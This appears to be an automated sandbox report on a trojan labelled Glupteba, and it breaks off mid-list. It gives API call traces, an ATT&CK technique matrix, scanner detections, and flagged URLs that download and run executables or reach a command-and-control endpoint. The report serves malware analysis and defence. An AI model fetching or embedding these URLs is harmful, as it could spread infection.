Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	3_2_00E60116
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_00E582A2
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	3_2_00E5834F
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	3_2_00E58423
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: EnumSystemLocalesW,	3_2_00E587C8
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: GetLocaleInfoW,	3_2_00E5884E
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	3_2_00E57BB3
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_00E57E83
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: EnumSystemLocalesW,	3_2_00E57E27
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	3_2_00E57F83
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	3_2_00E57F00
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,	4_2_00E58178
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	4_2_00E60116
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,	4_2_00E582A2
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,	4_2_00E5834F
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	4_2_00E58423
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: EnumSystemLocalesW,	4_2_00E587C8
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: GetLocaleInfoW,	4_2_00E5884E
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,	4_2_00E57BB3
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	4_2_00E57E83
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: EnumSystemLocalesW,	4_2_00E57E27
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,	4_2_00E57F83
Source: C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	Code function: _GetPrimaryLen,EnumSystemLocalesW,	4_2_00E57F00

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_004A2283 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004A2283

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_00489F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,

0_2_00489F90

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Code function: 0_2_0049FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_0049FE47

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

0_2_00489F90

Source: C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	3 Native API	1 Registry Run Keys / Startup Folder	11 Process Injection	1 Deobfuscate/Decode Files or Information	OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	2 Data Encrypted for Impact
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	1 Services File Permissions Weakness	1 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Services File Permissions Weakness	1 Masquerading	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	21 Virtualization/Sandbox Evasion	NTDS	24 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Process Injection	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Services File Permissions Weakness	Cached Domain Credentials	151 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	21 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	HTML Smuggling	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	87%	ReversingLabs	Win32.Trojan.Glupteba
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	76%	Virustotal		Browse
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	100%	Avira	HEUR/AGEN.1319085
baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	87%	ReversingLabs	Win32.Trojan.Glupteba
C:\Users\user\AppData\Local\f9db0e4d-9b2a-4f3a-8741-2b0aa0def8a9\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	76%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
zexeq.com	21%	Virustotal		Browse
colisumy.com	20%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://colisumy.com/dl/build2.exe$run	100%	URL Reputation	malware
http://zexeq.com/files/1/build3.exe$run	100%	URL Reputation	malware
http://zexeq.com/raud/get.php	100%	URL Reputation	malware
http://colisumy.com/dl/build2.exe	100%	URL Reputation	malware
http://zexeq.com/raud/get.phpep	100%	URL Reputation	malware
http://www.wikipedia.com/	0%	URL Reputation	safe
http://zexeq.com/files/1/build3.exe	100%	URL Reputation	malware
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.phpP	100%	Avira URL Cloud	malware
http://colisumy.com/dl/build2.exerun00.Y	100%	Avira URL Cloud	malware
https://api.b?	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true	100%	Avira URL Cloud	malware
http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	100%	Avira URL Cloud	malware
https://we.tl/t-tnzomMj6	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.phpP	18%	Virustotal		Browse
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637V	100%	Avira URL Cloud	malware
https://we.tl/t-tnzomMj6KnppRlYjmra845ChcK9KfcC6oyEQ3WR0jTu9TqM6BjS2eChMx7MCbe1L9N52XQ==	0%	Avira URL Cloud	safe
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637i	100%	Avira URL Cloud	malware
https://we.tl/t-tnzomMj6	0%	Virustotal		Browse
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	100%	Avira URL Cloud	malware
http://zexeq.com/files/1/build3.exerun8	100%	Avira URL Cloud	malware
https://we.tl/t-tnzomMj6HU	0%	Avira URL Cloud	safe
https://we.tl/t-tnzomMj6HU	0%	Virustotal		Browse
http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	16%	Virustotal		Browse
http://zexeq.com/files/1/build3.exerun8	17%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.2ip.ua	104.21.65.24	true	false		high
zexeq.com	199.59.242.150	true	true	21%, Virustotal, Browse	unknown
colisumy.com	unknown	unknown	true	20%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true	true	Avira URL Cloud: malware	unknown
http://zexeq.com/raud/get.php	true	URL Reputation: malware	unknown
https://api.2ip.ua/geo.json	false		high
http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	true	Avira URL Cloud: malware	unknown
http://zexeq.com/files/1/build3.exe	true	URL Reputation: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.b?	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001118000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://zexeq.com/raud/get.phpP	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://colisumy.com/dl/build2.exerun00.Y	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://colisumy.com/dl/build2.exe$run	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.2ip.ua/geo.json/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.amazon.com/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1934779392.0000000004120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.json)	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000003.1714776358.00000000009E4000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://github.com/andre-fuchs/kerning-pairs/blob/master/LICENSE.md).	30264859306.ttf.2.dr, 37262344671.ttf.2.dr	false		high
http://zexeq.com/files/1/build3.exe$run	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332095070.0000000003C40000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.000000000136B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
https://api.2ip.ua/geo.json%	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.0000000001166000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.twitter.com/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935241959.0000000004120000.00000004.00001000.00020000.00000000.sdmp	false		high
http://www.openssl.org/support/faq.html	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	false		high
https://www.google.com	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsongC	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.0000000001446000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.0000000001446000.00000004.00000020.00020000.00000000.sdmp	false		high
http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe	false	Avira URL Cloud: safe	low
https://api.2ip.ua/geo.jsons	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000005.00000002.1869083710.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	false		high
https://we.tl/t-tnzomMj6	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2315130907.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2309699551.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2305085641.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2327644820.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2270669928.0000000003C4B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2332149478.0000000003C50000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2321099831.0000000003C4F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A4D000.00000004.00000020.00020000.00000000.sdmp	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.2ip.ua/o	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000003.1786377999.000000000140D000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.000000000140F000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.reddit.com/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935177752.0000000004120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/geo.jsonsS	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000004.00000002.1787330867.00000000013A8000.00000004.00000020.00020000.00000000.sdmp	false		high
http://zexeq.com/files/1/build3.exe$runyinstall020921_delay721_sec.exe0	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.000000000136A000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.000000000136B000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.000000000136F000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2269675971.00000000013BD000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000003.00000002.2950549352.0000000000A3B000.00000004.00000020.00020000.00000000.sdmp	false	16%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.nytimes.com/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1935112454.0000000004120000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.2ip.ua/	baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000002.2330904102.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2019555788.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2316336423.0000000001389000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.1992501087.0000000001388000.00000004.00000020.00020000.00000000.sdmp, baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe, 00000002.00000003.2280417518.0000000001389000.00000004.00000020.00020000.00000000.sdmp, 